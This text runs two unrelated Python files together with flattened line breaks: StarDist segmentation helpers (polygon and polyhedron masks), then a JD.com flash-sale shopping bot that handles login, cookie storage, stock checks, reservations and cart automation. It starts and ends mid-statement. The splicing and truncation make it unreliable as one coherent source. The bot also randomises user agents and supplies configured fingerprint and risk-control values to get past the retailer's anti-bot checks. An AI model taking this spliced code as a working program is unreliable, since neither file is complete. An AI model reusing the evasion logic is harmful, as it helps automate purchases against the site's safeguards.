tuple(BlockND(i,blocks,axes) for i,blocks in enumerate(product(*cover_1d))) class Polygon: def __init__(self, coord, bbox=None, shape_max=None): self.bbox = self.coords_bbox(coord, shape_max=shape_max) if bbox is None else bbox self.coord = coord - np.array([r[0] for r in self.bbox]).reshape(2,1) self.slice = tuple(slice(*r) for r in self.bbox) self.shape = tuple(r[1]-r[0] for r in self.bbox) rr,cc = polygon(*self.coord, self.shape) self.mask = np.zeros(self.shape, np.bool) self.mask[rr,cc] = True @staticmethod def coords_bbox(*coords, shape_max=None): assert all(isinstance(c, np.ndarray) and c.ndim==2 and c.shape[0]==2 for c in coords) if shape_max is None: shape_max = (np.inf, np.inf) coord = np.concatenate(coords, axis=1) mins = np.maximum(0, np.floor(np.min(coord,axis=1))).astype(int) maxs = np.minimum(shape_max, np.ceil (np.max(coord,axis=1))).astype(int) return tuple(zip(tuple(mins),tuple(maxs))) class Polyhedron: def __init__(self, dist, origin, rays, bbox=None, shape_max=None): self.bbox = self.coords_bbox((dist, origin), rays=rays, shape_max=shape_max) if bbox is None else bbox self.slice = tuple(slice(*r) for r in self.bbox) self.shape = tuple(r[1]-r[0] for r in self.bbox) _origin = origin.reshape(1,3) - np.array([r[0] for r in self.bbox]).reshape(1,3) self.mask = polyhedron_to_label(dist[np.newaxis], _origin, rays, shape=self.shape, verbose=False).astype(np.bool) @staticmethod def coords_bbox(*dist_origin, rays, shape_max=None): dists, points = zip(*dist_origin) assert all(isinstance(d, np.ndarray) and d.ndim==1 and len(d)==len(rays) for d in dists) assert all(isinstance(p, np.ndarray) and p.ndim==1 and len(p)==3 for p in points) dists, points, verts = np.stack(dists)[...,np.newaxis], np.stack(points)[:,np.newaxis], rays.vertices[np.newaxis] coord = dists * verts + points coord = np.concatenate(coord, axis=0) if shape_max is None: shape_max = (np.inf, np.inf, np.inf) mins = np.maximum(0, np.floor(np.min(coord,axis=0))).astype(int) maxs = np.minimum(shape_max, np.ceil (np.max(coord,axis=0))).astype(int) return tuple(zip(tuple(mins),tuple(maxs))) # def repaint_labels(output, labels, polys, show_progress=True): # """Repaint object instances in correct order based on probability scores. # Does modify 'output' and 'polys' in-place, but will only write sparsely to 'output' where needed. # output: numpy.ndarray or similar # Label image (integer-valued) # labels: iterable of int # List of integer label ids that occur in output # polys: dict # Dictionary of polygon/polyhedra properties. # Assumption is that the label id (-1) corresponds to the index in the polys dict # """ # assert output.ndim in (2,3) # if show_progress: # labels = tqdm(labels, leave=True) # labels_eliminated = set() # # TODO: inelegant to have so much duplicated code here # if output.ndim == 2: # coord = lambda i: polys['coord'][i-1] # prob = lambda i: polys['prob'][i-1] # for i in labels: # if i in labels_eliminated: continue # poly_i = Polygon(coord(i), shape_max=output.shape) # # find all labels that overlap with i (including i) # overlapping = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0} # assert i in overlapping # # compute bbox union to find area to crop/replace in large output label image # bbox_union = Polygon.coords_bbox(*[coord(j) for j in overlapping], shape_max=output.shape) # # crop out label i, including the region that include all overlapping labels # poly_i = Polygon(coord(i), bbox=bbox_union) # mask = poly_i.mask.copy() # # remove pixels from mask that belong to labels with higher probability # for j in [j for j in overlapping if prob(j) > prob(i)]: # mask[ Polygon(coord(j), bbox=bbox_union).mask ] = False # crop = output[poly_i.slice] # crop[crop==i] = 0 # delete all remnants of i in crop # crop[mask] = i # paint i where mask still active # labels_remaining = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0} # labels_eliminated.update(overlapping - labels_remaining) # else: # dist = lambda i: polys['dist'][i-1] # origin = lambda i: polys['points'][i-1] # prob = lambda i: polys['prob'][i-1] # rays = polys['rays'] # for i in labels: # if i in labels_eliminated: continue # poly_i = Polyhedron(dist(i), origin(i), rays, shape_max=output.shape) # # find all labels that overlap with i (including i) # overlapping = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0} # assert i in overlapping # # compute bbox union to find area to crop/replace in large output label image # bbox_union = Polyhedron.coords_bbox(*[(dist(j),origin(j)) for j in overlapping], rays=rays, shape_max=output.shape) # # crop out label i, including the region that include all overlapping labels # poly_i = Polyhedron(dist(i), origin(i), rays, bbox=bbox_union) # mask = poly_i.mask.copy() # # remove pixels from mask that belong to labels with higher probability # for j in [j for j in overlapping if prob(j) > prob(i)]: # mask[ Polyhedron(dist(j), origin(j), rays, bbox=bbox_union).mask ] = False # crop = output[poly_i.slice] # crop[crop==i] = 0 # delete all remnants of i in crop # crop[mask] = i # paint i where mask still active # labels_remaining = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0} # labels_eliminated.update(overlapping - labels_remaining) # if len(labels_eliminated) > 0: # ind = [i-1 for i in labels_eliminated] # for k,v in polys.items(): # if k in OBJECT_KEYS: # polys[k] = np.delete(v, ind, axis=0) ############ def predict_big(model, *args, **kwargs): from .models import StarDist2D, StarDist3D if isinstance(model,(StarDist2D,StarDist3D)): dst = model.__class__.__name__ else: dst = '{StarDist2D, StarDist3D}' raise RuntimeError(f"This function has moved to {dst}.predict_instances_big.") class NotFullyVisible(Exception): pass def _grid_divisible(grid, size, name=None, verbose=True): if size % grid == 0: return size _size = size size = math.ceil(size / grid) * grid if bool(verbose): print(f"{verbose if isinstance(verbose,str) else ''}increasing '{'value' if name is None else name}' from {_size} to {size} to be evenly divisible by {grid} (grid)", flush=True) assert size % grid == 0 return size # def render_polygons(polys, shape): # return polygons_to_label_coord(polys['coord'], shape=shape)
#!/usr/bin/env python # -*- coding: utf-8 -*- import json import os import pickle import random import re import time from datetime import datetime, timedelta from urllib import parse import requests from bs4 import BeautifulSoup import CustomBrowser import address_util from config import global_config from exception import AsstException from log import logger from messenger import Messenger from socketclient import SocketClient, util from socketclient.utils import http_util from socketclient.utils.http import cookie_util from timer import Timer from util import ( DEFAULT_TIMEOUT, DEFAULT_USER_AGENT, check_login, deprecated, encrypt_pwd, encrypt_payment_pwd, get_tag_value, get_random_useragent, open_image, parse_area_id, parse_json, parse_sku_id, parse_items_dict, response_status, save_image, split_area_id, DEFAULT_M_USER_AGENT, nested_parser, nested_inner_parser ) class Assistant(object): def __init__(self, use_new=False): self.config = None self.backend_mod = util.load_backend('gevent') self.sem = self.backend_mod.Semaphore(1) self.event = self.backend_mod.Event() self.socket_client = SocketClient(backend=self.backend_mod) # 功能相关 self.concurrent_gevent_array = [] self.concurrent_count = global_config.concurrent_count self.start_func = None self.chromedriver_path = global_config.get('config', 'chromedriver_path') self.chrome_path = global_config.get('config', 'chrome_path') self.timeout = float(global_config.get('config', 'timeout') or DEFAULT_TIMEOUT) self.send_message = global_config.getboolean('messenger', 'enable') self.messenger = Messenger(global_config.get('messenger', 'sckey')) if self.send_message else None use_random_ua = global_config.getboolean('config', 'random_useragent') if use_new: self.user_agent = DEFAULT_M_USER_AGENT elif not use_random_ua: self.user_agent = DEFAULT_USER_AGENT else: self.user_agent = get_random_useragent() self.use_new = use_new self.br = None self.headers = {'User-Agent': self.user_agent} # 用户相关 if use_new: self.data = dict() self.eid = global_config.get('config', 'eid') self.fp = global_config.get('config', 'fp') self.track_id = global_config.get('config', 'track_id') self.risk_control = global_config.get('config', 'risk_control') self.letterMap = ["Z", "A", "B", "C", "D", "E", "F", "G", "H", "I"] self.area_id = None self.item_zzz = dict() self.item_url_param = dict() self.item_cat = dict() self.item_vender_ids = dict() # 记录商家id self.param_json = dict() # 记录参数 self.special_attrs = dict() # self.seckill_init_info = dict() # self.seckill_order_data = dict() # self.seckill_url = dict() self.item_requests = [] self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.username = '' self.nick_name = '' self.is_login = False self.sess = requests.session() self.cookies_str = None # 请求信息 self.request_info = dict() try: self._load_cookies() except Exception: pass # 已登录则刷新cookies if self.is_login: self.nick_name = self.get_user_info() self._save_cookies() def init_browser(self, headless=True): br = self.br = CustomBrowser.CustomBrowser(self.user_agent, self.chromedriver_path, self.chrome_path, headless) count = 0 # 启动浏览器 while True: try: br.openUrl('chrome://version/') except Exception as e: logger.error(e) logger.error(f'无法初始化浏览器cookies,' f'请检查config.ini文件中chromedriver_path与chrome_path的配置 或 检查网络代理是否关闭,开启代理会导致浏览器初始化失败') if count > 3: if br: br.quit() logger.error('初始化浏览器cookies失败!' '请检查config.ini文件中chromedriver_path与chrome_path的配置 或 检查网络代理是否关闭,开启代理会导致浏览器初始化失败!') exit(-1) else: break count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) return br @property def seckill_url(self): return self.item_requests[0] @property def is_request_seckill_url(self): return self.item_requests[1] @property def seckill_init_info(self): return self.item_requests[2] @property def seckill_order_data(self): return self.item_requests[3] @property def is_seckill_checkout_page(self): return self.item_requests[4] @property def is_add_cart_request(self): return self.item_requests[5] @property def is_get_checkout_page(self): return self.item_requests[6] @property def get_submit_page_data(self): return self.item_requests[7] @property def get_promiseUuid(self): return self.item_requests[8] @property def get_submit_data(self): return self.item_requests[9] @property def get_submit_referer(self): return self.item_requests[10] def _load_cookies(self): cookies_file = '' for name in os.listdir('../cookies'): if name.endswith('.cookies'): cookies_file = '../cookies/{0}'.format(name) break with open(cookies_file, 'rb') as f: local_cookies = pickle.load(f) self.sess.cookies.update(local_cookies) self.is_login = self._validate_cookies() def _save_cookies(self): cookies_file = '../cookies/{0}.cookies'.format(self.nick_name) directory = os.path.dirname(cookies_file) if not os.path.exists(directory): os.makedirs(directory) with open(cookies_file, 'wb') as f: pickle.dump(self.sess.cookies, f) def _validate_cookies(self): """验证cookies是否有效(是否登陆) 通过访问用户订单列表页进行判断:若未登录,将会重定向到登陆页面。 :return: cookies是否有效 True/False """ if self.use_new: url = 'https://wq.jd.com/user/info/GetUserAllPinInfo' # url = 'https://home.m.jd.com/myJd/home.action' # url = 'https://home.m.jd.com/userinfom/QueryUserInfoM' params = { 'sceneval': 2, 'g_login_type': 1, 'callback': 'userInfoCallBack', 'g_ty': 'ls', '_': str(int(time.time() * 1000)) } try: resp = self.sess.get(url=url, params=params, headers={'dnt': '1', 'referer': 'https://wqs.jd.com/', 'sec-fetch-dest': 'script', 'sec-fetch-mode': 'no-cors', 'sec-fetch-site': 'same-site', 'user-agent': self.user_agent}, allow_redirects=False) if resp.status_code == requests.codes.OK: html = resp.text if html and 'pin' in html: match = re.search(r'^try\{userInfoCallBack\((.*)\);\}catch\(e\)\{\}$', html) if match: json_str = match.group(1) if json_str: json_dict = json.loads(json_str) self.nick_name = json_dict['userdata']['renderJDDate'][0]['msg']['nickname'] return True except Exception as e: logger.error(e) self.sess = requests.session() return False else: url = 'https://order.jd.com/center/list.action' # payload = { # 'rid': str(int(time.time() * 1000)), # } try: resp = self.sess.get(url=url, headers={'dnt': '1', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'upgrade-insecure-requests': '1', 'user-agent': self.user_agent}, allow_redirects=False) if resp.status_code == requests.codes.OK: return True except Exception as e: logger.error(e) self.sess = requests.session() return False @deprecated def _need_auth_code(self, username): url = 'https://passport.jd.com/uc/showAuthCode' data = { 'loginName': username, } payload = { 'version': 2015, 'r': random.random(), } resp = self.sess.post(url, params=payload, data=data, headers=self.headers) if not response_status(resp): logger.error('获取是否需要验证码失败') return False resp_json = json.loads(resp.text[1:-1]) # ({"verifycode":true}) return resp_json['verifycode'] @deprecated def _get_auth_code(self, uuid): image_file = os.path.join(os.getcwd(), 'jd_authcode.jpg') url = 'https://authcode.jd.com/verify/image' payload = { 'a': 1, 'acid': uuid, 'uid': uuid, 'yys': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login', } resp = self.sess.get(url, params=payload, headers=headers) if not response_status(resp): logger.error('获取验证码失败') return '' save_image(resp, image_file) open_image(image_file) return input('验证码:') def _get_login_page(self): url = "https://passport.jd.com/new/login.aspx" page = self.sess.get(url, headers=self.headers) return page @deprecated def _get_login_data(self): page = self._get_login_page() soup = BeautifulSoup(page.text, "html.parser") input_list = soup.select('.form input') # eid & fp are generated by local javascript code according to browser environment return { 'sa_token': input_list[0]['value'], 'uuid': input_list[1]['value'], '_t': input_list[4]['value'], 'loginType': input_list[5]['value'], 'pubKey': input_list[7]['value'], 'eid': self.eid, 'fp': self.fp, } @deprecated def login_by_username(self): if self.is_login: logger.info('登录成功') return True username = input('账号:') password = input('密码:') if (not username) or (not password): logger.error('用户名或密码不能为空') return False self.username = username data = self._get_login_data() uuid = data['uuid'] auth_code = '' if self._need_auth_code(username): logger.info('本次登录需要验证码') auth_code = self._get_auth_code(uuid) else: logger.info('本次登录不需要验证码') login_url = "https://passport.jd.com/uc/loginService" payload = { 'uuid': uuid, 'version': 2015, 'r': random.random(), } data['authcode'] = auth_code data['loginname'] = username data['nloginpwd'] = encrypt_pwd(password) headers = { 'User-Agent': self.user_agent, 'Origin': 'https://passport.jd.com', } resp = self.sess.post(url=login_url, data=data, headers=headers, params=payload) if not response_status(resp): logger.error('登录失败') return False if not self._get_login_result(resp): return False # login success logger.info('登录成功') self.nick_name = self.get_user_info() self._save_cookies() self.is_login = True return True @deprecated def _get_login_result(self, resp): resp_json = parse_json(resp.text) error_msg = '' if 'success' in resp_json: # {"success":"http://www.jd.com"} return True elif 'emptyAuthcode' in resp_json: # {'_t': '_t', 'emptyAuthcode': '请输入验证码'} # {'_t': '_t', 'emptyAuthcode': '验证码不正确或验证码已过期'} error_msg = resp_json['emptyAuthcode'] elif 'username' in resp_json: # {'_t': '_t', 'username': '账户名不存在,请重新输入'} # {'username': '服务器繁忙,请稍后再试', 'venture': 'xxxx', 'p': 'xxxx', 'ventureRet': 'http://www.jd.com/', '_t': '_t'} if resp_json['username'] == '服务器繁忙,请稍后再试': error_msg = resp_json['username'] + '(预计账户存在风险,需短信激活)' else: error_msg = resp_json['username'] elif 'pwd' in resp_json: # {'pwd': '账户名与密码不匹配,请重新输入', '_t': '_t'} error_msg = resp_json['pwd'] else: error_msg = resp_json logger.error(error_msg) return False def _get_QRcode(self): url = 'https://qr.m.jd.com/show' payload = { 'appid': 133, 'size': 147, 't': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/', } resp = self.sess.get(url=url, headers=headers, params=payload) if not response_status(resp): logger.info('获取二维码失败') return False QRCode_file = '../QRcode.png' save_image(resp, QRCode_file) logger.info('二维码获取成功,请打开京东APP扫描') open_image(QRCode_file) return True def _get_QRcode_ticket(self): url = 'https://qr.m.jd.com/check' payload = { 'appid': '133', 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'token': self.sess.cookies.get('wlfstk_smdl'), '_': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/', } resp = self.sess.get(url=url, headers=headers, params=payload) if not response_status(resp): logger.error('获取二维码扫描结果异常') return False resp_json = parse_json(resp.text) if resp_json['code'] != 200: logger.info('Code: %s, Message: %s', resp_json['code'], resp_json['msg']) return None else: logger.info('已完成手机客户端确认') return resp_json['ticket'] def _validate_QRcode_ticket(self, ticket): url = 'https://passport.jd.com/uc/qrCodeTicketValidation' headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login?ltype=logout', } resp = self.sess.get(url=url, headers=headers, params={'t': ticket}) if not response_status(resp): return False resp_json = json.loads(resp.text) if resp_json['returnCode'] == 0: return True else: logger.info(resp_json) return False def login_by_QRcode(self): """二维码登陆 :return: """ br = self.init_browser() domain = '.jd.com' br.openUrl(f'https://www{domain}') br.set_cookies(self.sess.cookies, domain) if self.is_login: logger.info('登录成功') else: self._get_login_page() # download QR code if not self._get_QRcode(): raise AsstException('二维码下载失败') # get QR code ticket ticket = None retry_times = 85 for _ in range(retry_times): ticket = self._get_QRcode_ticket() if ticket: break time.sleep(2) else: raise AsstException('二维码过期,请重新获取扫描') # validate QR code ticket if not self._validate_QRcode_ticket(ticket): raise AsstException('二维码信息校验失败') logger.info('二维码登录成功') self.is_login = True self.nick_name = self.get_user_info() self._save_cookies() # 获取下单必须参数 self.init_order_request_info() def login_by_browser(self): """浏览器登录 :return: """ br = self.init_browser(False) br.client.set_window_size(375, 812) domain = '.m.jd.com' # br.openUrl(f'https://plogin{domain}/login/login') br.openUrl(f'https://plogin{domain}/login/login') # br.openUrl(f'https://passport{domain}/new/login.aspx') br.set_cookies(self.sess.cookies, domain) if self.is_login: # br.openUrl(f'https://m.jd.com/') logger.info('登录成功') else: retry_count = 60 for _ in range(retry_count): pt_key = br.client.get_cookie('pt_key') if pt_key: break time.sleep(2) else: br.quit() raise AsstException('登录时间过长,请重新启动') cookies = br.client.get_cookies() for cookie in cookies: if 'expiry' in cookie: expires = cookie['expiry'] else: expires = None self.sess.cookies.set(cookie['name'], cookie['value'] , domain=cookie['domain'], secure=cookie['secure'], expires=expires) if not self._validate_cookies(): raise AsstException('浏览器登录校验失败') logger.info('浏览器登录成功') self.is_login = True self.nick_name = self.get_user_info() self._save_cookies() # 获取下单必须参数 self.init_order_request_info() def _get_reserve_url(self, sku_id): url = 'https://yushou.jd.com/youshouinfo.action' payload = { 'callback': 'fetchJSON', 'sku': sku_id, } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp = self.sess.get(url=url, params=payload, headers=headers) resp_json = parse_json(resp.text) # {"type":"1","hasAddress":false,"riskCheck":"0","flag":false,"num":941723,"stime":"2018-10-12 12:40:00","plusEtime":"","qiangEtime":"","showPromoPrice":"0","qiangStime":"","state":2,"sku":100000287121,"info":"\u9884\u7ea6\u8fdb\u884c\u4e2d","isJ":0,"address":"","d":48824,"hidePrice":"0","yueEtime":"2018-10-19 15:01:00","plusStime":"","isBefore":0,"url":"//yushou.jd.com/toYuyue.action?sku=100000287121&key=237af0174f1cffffd227a2f98481a338","etime":"2018-10-19 15:01:00","plusD":48824,"category":"4","plusType":0,"yueStime":"2018-10-12 12:40:00"}; reserve_url = resp_json.get('url') return 'https:' + reserve_url if reserve_url else None @check_login def make_reserve(self, sku_id): """商品预约 :param sku_id: 商品id :return: """ reserve_url = self._get_reserve_url(sku_id) if not reserve_url: logger.error('%s 非预约商品', sku_id) return headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp = self.sess.get(url=reserve_url, headers=headers) soup = BeautifulSoup(resp.text, "html.parser") reserve_result = soup.find('p', {'class': 'bd-right-result'}).text.strip(' \t\r\n') # 预约成功,已获得抢购资格 / 您已成功预约过了,无需重复预约 logger.info(reserve_result) @check_login def new_reserve(self, sku_id): """商品预约 :param sku_id: 商品id :return: """ try: page_url = 'https://wqs.jd.com/item/yuyue_item.shtml' page_payload = { 'sceneval': '2', 'buyNum': '2', 'sku': sku_id, 'isdraw': '', 'activeid': '', 'activetype': '', 'ybServiceId': '', 'homeServiceId': '', 'ycServiceId': '', 'jxsid': str(int(time.time() * 1000)) + str(random.random())[2:7] } page_headers = { 'dnt': '1', 'referer': 'https://item.m.jd.com/', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'same-site', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'User-Agent': self.user_agent } page_resp = self.sess.get(url=page_url, params=page_payload, headers=page_headers) page_html = page_resp.text if not page_html: logger.error('商品 %s 预约页面加载失败', sku_id) yuyue_url = 'https://wq.jd.com/bases/yuyue/item' yuyue_payload = { 'callback': f'subscribeItemCB{self.letterMap[1]}', 'dataType': '1', 'skuId': sku_id, 'sceneval': '2' } yuyue_headers = { 'dnt': '1', 'referer': 'https://wqs.jd.com/', 'sec-fetch-dest': 'script', 'sec-fetch-mode': 'no-cors', 'sec-fetch-site': 'same-site', # 'sec-fetch-user': '?1', # 'upgrade-insecure-requests': '1', 'User-Agent': self.user_agent } yuyue_resp = self.sess.get(url=yuyue_url, params=yuyue_payload, headers=yuyue_headers) yuyue_json = yuyue_resp.text if yuyue_json: if '"replyMsg":"预约成功"' in yuyue_json: logger.info("商品 %s 预约成功", sku_id) return True elif 'replyMsg: "您已经成功预约,不需重复预约"' in yuyue_json: logger.info("商品 %s 已经预约", sku_id) return True logger.error('响应数据:%s', yuyue_json) except Exception as e: logger.error(e) logger.error('商品 %s 预约失败,请手动预约', sku_id) return False @check_login def get_user_info(self): """获取用户信息 :return: 用户名 """ if self.use_new: return self.nick_name else: url = 'https://passport.jd.com/user/petName/getUserInfoForMiniJd.action' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), '_': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://order.jd.com/center/list.action', } try: resp = self.sess.get(url=url, params=payload, headers=headers) resp_json = parse_json(resp.text) # many user info are included in response, now return nick name in it # jQuery2381773({"imgUrl":"//storage.360buyimg.com/i.imageUpload/xxx.jpg","lastLoginTime":"","nickName":"xxx","plusStatus":"0","realName":"xxx","userLevel":x,"userScoreVO":{"accountScore":xx,"activityScore":xx,"consumptionScore":xxxxx,"default":false,"financeScore":xxx,"pin":"xxx","riskScore":x,"totalScore":xxxxx}}) return resp_json.get('nickName') or 'jd' except Exception: return 'jd' def new_get_item_detail_page(self, sku_id): """访问商品详情页 :param sku_id: 商品id :return: 响应 """ url = 'https://item.m.jd.com/product/{}.html'.format(sku_id) headers = self.headers.copy() headers['dnt'] = '1' headers['sec-fetch-user'] = '?1' headers['sec-fetch-site'] = 'none' headers['sec-fetch-mode'] = 'navigate' headers['sec-fetch-dest'] = 'document' headers['upgrade-insecure-requests'] = '1' page = self.sess.get(url=url, headers=headers) return page def _get_item_detail_page(self, sku_id): """访问商品详情页 :param sku_id: 商品id :return: 响应 """ url = 'https://item.jd.com/{}.html'.format(sku_id) page = requests.get(url=url, headers=self.headers) return page def get_single_item_stock(self, sku_id, num, area): """获取单个商品库存状态 :param sku_id: 商品id :param num: 商品数量 :param area: 地区id :return: 商品是否有货 True/False """ area_id = parse_area_id(area) cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) if not cat: page = self._get_item_detail_page(sku_id) match = re.search(r'cat: \[(.*?)\]', page.text) cat = match.group(1) self.item_cat[sku_id] = cat match = re.search(r'venderId:(\d*?),', page.text) vender_id = match.group(1) self.item_vender_ids[sku_id] = vender_id url = 'https://c0.3.cn/stock' payload = { 'skuId': sku_id, 'buyNum': num, 'area': area_id, 'ch': 1, '_': str(int(time.time() * 1000)), 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'extraParam': '{"originid":"1"}', # get error stock state without this param 'cat': cat, # get 403 Forbidden without this param (obtained from the detail page) 'venderId': vender_id # return seller information with this param (can't be ignored) } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp_text = '' try: resp_text = requests.get(url=url, params=payload, headers=headers, timeout=self.timeout).text resp_json = parse_json(resp_text) stock_info = resp_json.get('stock') sku_state = stock_info.get('skuState') # 商品是否上架 stock_state = stock_info.get('StockState') # 商品库存状态:33 -- 现货 0,34 -- 无货 36 -- 采购中 40 -- 可配货 return sku_state == 1 and stock_state in (33, 40) except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', sku_id, self.timeout) return False except requests.exceptions.RequestException as request_exception: logger.error('查询 %s 库存信息发生网络请求异常:%s', sku_id, request_exception) return False except Exception as e: logger.error('查询 %s 库存信息发生异常, resp: %s, exception: %s', sku_id, resp_text, e) return False @check_login def get_multi_item_stock(self, sku_ids, area): """获取多个商品库存状态(旧) 该方法需要登陆才能调用,用于同时查询多个商品的库存。 京东查询接口返回每种商品的状态:有货/无货。当所有商品都有货,返回True;否则,返回False。 :param sku_ids: 多个商品的id。可以传入中间用英文逗号的分割字符串,如"123,456" :param area: 地区id :return: 多个商品是否同时有货 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id_list = split_area_id(area) url = 'https://trade.jd.com/api/v1/batch/stock' headers = { 'User-Agent': self.user_agent, 'Origin': 'https://trade.jd.com', 'Content-Type': 'application/json; charset=UTF-8', 'Referer': 'https://trade.jd.com/shopping/order/getOrderInfo.action?rid=' + str(int(time.time() * 1000)), } data = { "areaRequest": { "provinceId": area_id_list[0], "cityId": area_id_list[1], "countyId": area_id_list[2], "townId": area_id_list[3] }, "skuNumList": [] } for sku_id, count in items_dict.items(): data['skuNumList'].append({ "skuId": sku_id, "num": count }) # convert to string data = json.dumps(data) try: resp = self.sess.post(url=url, headers=headers, data=data, timeout=self.timeout) except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', list(items_dict.keys()), self.timeout) return False except requests.exceptions.RequestException as e: raise AsstException('查询 %s 库存信息异常:%s' % (list(items_dict.keys()), e)) resp_json = parse_json(resp.text) result = resp_json.get('result') stock = True for sku_id in result: status = result.get(sku_id).get('status') if '无货' in status: stock = False break return stock def get_multi_item_stock_new(self, sku_ids, area): """获取多个商品库存状态(新) 当所有商品都有货,返回True;否则,返回False。 :param sku_ids: 多个商品的id。可以传入中间用英文逗号的分割字符串,如"123,456" :param area: 地区id :return: 多个商品是否同时有货 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id = parse_area_id(area=area) url = 'https://c0.3.cn/stocks' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'type': 'getstocks', 'skuIds': ','.join(items_dict.keys()), 'area': area_id, '_': str(int(time.time() * 1000)) } headers = { 'User-Agent': self.user_agent } resp_text = '' try: resp_text = requests.get(url=url, params=payload, headers=headers, timeout=self.timeout).text stock = True for sku_id, info in parse_json(resp_text).items(): sku_state = info.get('skuState') # 商品是否上架 stock_state = info.get('StockState') # 商品库存状态 if sku_state == 1 and stock_state in (33, 40): continue else: stock = False break return stock except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', list(items_dict.keys()), self.timeout) return False except requests.exceptions.RequestException as request_exception: logger.error('查询 %s 库存信息发生网络请求异常:%s', list(items_dict.keys()), request_exception) return False except Exception as e: logger.error('查询 %s 库存信息发生异常, resp: %s, exception: %s', list(items_dict.keys()), resp_text, e) return False def _if_item_removed(self, sku_id): """判断商品是否下架 :param sku_id: 商品id :return: 商品是否下架 True/False """ detail_page = self._get_item_detail_page(sku_id=sku_id) return '该商品已下柜' in detail_page.text @check_login def if_item_can_be_ordered(self, sku_ids, area): """判断商品是否能下单 :param sku_ids: 商品id,多个商品id中间使用英文逗号进行分割 :param area: 地址id :return: 商品是否能下单 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id = parse_area_id(area) # 判断商品是否能下单 if len(items_dict) > 1: return self.get_multi_item_stock_new(sku_ids=items_dict, area=area_id) sku_id, count = list(items_dict.items())[0] return self.get_single_item_stock(sku_id=sku_id, num=count, area=area_id) def get_item_price(self, sku_id): """获取商品价格 :param sku_id: 商品id :return: 价格 """ url = 'http://p.3.cn/prices/mgets' payload = { 'type': 1, 'pduid': int(time.time() * 1000), 'skuIds': 'J_' + sku_id, } resp = self.sess.get(url=url, params=payload) return parse_json(resp.text).get('p') @check_login def add_item_to_cart(self, sku_ids): """添加商品到购物车 重要: 1.商品添加到购物车后将会自动被勾选✓中。 2.在提交订单时会对勾选的商品进行结算。 3.部分商品(如预售、下架等)无法添加到购物车 京东购物车可容纳的最大商品种数约为118-120种,超过数量会加入购物车失败。 :param sku_ids: 商品id,格式:"123" 或 "123,456" 或 "123:1,456:2"。若不配置数量,默认为1个。 :return: """ add_cart_request = self.request_info['add_cart_request'] for sku_id, count in parse_sku_id(sku_ids=sku_ids).items(): payload = { 'pid': sku_id, 'pcount': count, 'ptype': 1, } add_cart_request(payload) @check_login def clear_cart(self): """清空购物车 包括两个请求: 1.选中购物车中所有的商品 2.批量删除 :return: 清空购物车结果 True/False """ # 1.select all items 2.batch remove items select_url = 'https://cart.jd.com/selectAllItem.action' remove_url = 'https://cart.jd.com/batchRemoveSkusFromCart.action' data = { 't': 0, 'outSkus': '', 'random': random.random(), } try: select_resp = self.sess.post(url=select_url, data=data) time.sleep(2) remove_resp = self.sess.post(url=remove_url, data=data) if (not response_status(select_resp)) or (not response_status(remove_resp)): logger.error('购物车清空失败') return False logger.info('购物车清空成功') return True except Exception as e: logger.error(e) return False @check_login def get_cart_detail(self): """获取购物车商品详情 :return: 购物车商品信息 dict """ url = 'https://cart.jd.com/cart.action' resp = self.sess.get(url) soup = BeautifulSoup(resp.text, "html.parser") cart_detail = dict() for item in soup.find_all(class_='item-item'): try: sku_id = item['skuid'] # 商品id # 例如:['increment', '8888', '100001071956', '1', '13', '0', '50067652554'] # ['increment', '8888', '100002404322', '2', '1', '0'] item_attr_list = item.find(class_='increment')['id'].split('_') p_type = item_attr_list[4] promo_id = target_id = item_attr_list[-1] if len(item_attr_list) == 7 else 0 cart_detail[sku_id] = { 'name': get_tag_value(item.select('div.p-name a')), # 商品名称 'verder_id': item['venderid'], # 商家id 'count': int(item['num']), # 数量 'unit_price': get_tag_value(item.select('div.p-price strong'))[1:], # 单价 'total_price': get_tag_value(item.select('div.p-sum strong'))[1:], # 总价 'is_selected': 'item-selected' in item['class'], # 商品是否被勾选 'p_type': p_type, 'target_id': target_id, 'promo_id': promo_id } except Exception as e: logger.error("某商品在购物车中的信息无法解析,报错信息: %s,该商品自动忽略。 %s", e, item) logger.info('购物车信息:%s', cart_detail) return cart_detail def _cancel_select_all_cart_item(self): """取消勾选购物车中的所有商品 :return: 取消勾选结果 True/False """ url = "https://cart.jd.com/cancelAllItem.action" data = { 't': 0, 'outSkus': '', 'random': random.random() # 'locationId' can be ignored } resp = self.sess.post(url, data=data) return 